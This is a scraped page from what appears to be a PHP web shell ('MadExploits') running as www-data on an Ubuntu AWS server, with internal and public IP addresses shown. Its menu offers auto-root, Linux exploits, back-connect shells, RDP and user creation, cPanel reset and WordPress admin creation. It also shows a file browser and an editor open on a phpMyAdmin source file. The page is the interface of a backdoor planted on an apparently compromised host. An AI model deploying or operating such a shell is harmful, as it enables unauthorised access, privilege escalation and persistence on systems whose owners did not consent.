Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.189.195.48
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
var /
phpmyadmin /
src /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
AssetExtension.php
953
B
-rw-r--r--
CoreExtension.php
488
B
-rw-r--r--
FlashMessagesExtension.php
389
B
-rw-r--r--
I18nExtension.php
680
B
-rw-r--r--
MessageExtension.php
1010
B
-rw-r--r--
SanitizeExtension.php
935
B
-rw-r--r--
TransformationsExtension.php
722
B
-rw-r--r--
UrlExtension.php
1.16
KB
-rw-r--r--
UtilExtension.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MessageExtension.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Twig; use PhpMyAdmin\Message; use Twig\Extension\AbstractExtension; use Twig\TwigFilter; class MessageExtension extends AbstractExtension { /** * Returns a list of filters to add to the existing list. * * @return TwigFilter[] */ public function getFilters(): array { return [ new TwigFilter( 'notice', static fn (string $string): string => Message::notice($string)->getDisplay(), ['is_safe' => ['html']], ), new TwigFilter( 'error', static fn (string $string): string => Message::error($string)->getDisplay(), ['is_safe' => ['html']], ), new TwigFilter( 'raw_success', static fn (string $string): string => Message::rawSuccess($string)->getDisplay(), ['is_safe' => ['html']], ), ]; } }
Close